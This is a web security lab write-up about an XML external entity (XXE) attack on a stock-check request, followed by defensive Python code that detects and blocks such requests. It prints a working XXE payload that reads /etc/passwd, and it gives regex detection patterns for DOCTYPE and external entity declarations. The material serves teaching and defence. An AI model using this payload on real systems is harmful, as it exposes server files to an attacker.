
While clicking the Check Stock button and intercepting the request, we observed that the POST request body was sent as XML.

We injected a simple XXE payload that declares an external entity for file:///etc/passwd and references it in the productId element, which read the internal file /etc/passwd and solved the lab.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
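The defender-side counterpart, added here as an example and not part of the original write-up: it assumes the stock-check endpoint is written in Python with the standard-library xml.sax parser, flags request bodies that carry a DOCTYPE or an external entity declaration, and parses only with DTDs rejected and external entity resolution switched off, so the payload above yields an empty productId instead of file contents.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Constructed sample bodies: the write-up's XXE payload and a benign stock check.
XXE_BODY = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"""
BENIGN_BODY = b"""<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"""

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# general or parameter entity declared with an external (SYSTEM/PUBLIC) identifier
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+(%\s*)?\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)

def classify_request(body: bytes) -> str:
    """Detection view: label a raw request body for logging or a WAF rule."""
    if EXTERNAL_ENTITY_RE.search(body):
        return "xxe-external-entity"
    if DOCTYPE_RE.search(body):
        return "doctype-present"
    return "clean"

class StockCheckHandler(ContentHandler):
    """Collects the text of the two leaf elements the endpoint expects."""
    def __init__(self):
        super().__init__()
        self.fields = {}
        self._buf = []
    def startElement(self, name, attrs):
        self._buf = []
    def characters(self, content):
        self._buf.append(content)
    def endElement(self, name):
        if name in ("productId", "storeId"):
            self.fields[name] = "".join(self._buf).strip()

def parse_stock_check(body: bytes, reject_doctype: bool = True) -> dict:
    """Hardened parse: refuse any DTD up front, and even if one slips through
    never fetch external entities, so &xxe; expands to nothing, not a file."""
    if reject_doctype and DOCTYPE_RE.search(body):
        raise ValueError("stockCheck request must not contain a DOCTYPE")
    handler = StockCheckHandler()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, False)  # no SYSTEM "file:///..." fetches
    parser.setFeature(feature_external_pes, False)  # no external parameter entities
    parser.parse(io.BytesIO(body))
    return handler.fields
```

Rejecting the DOCTYPE is the primary control; the parser features are defence in depth, and parse_stock_check(XXE_BODY, reject_doctype=False) shows the entity collapsing to an empty string rather than the file.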
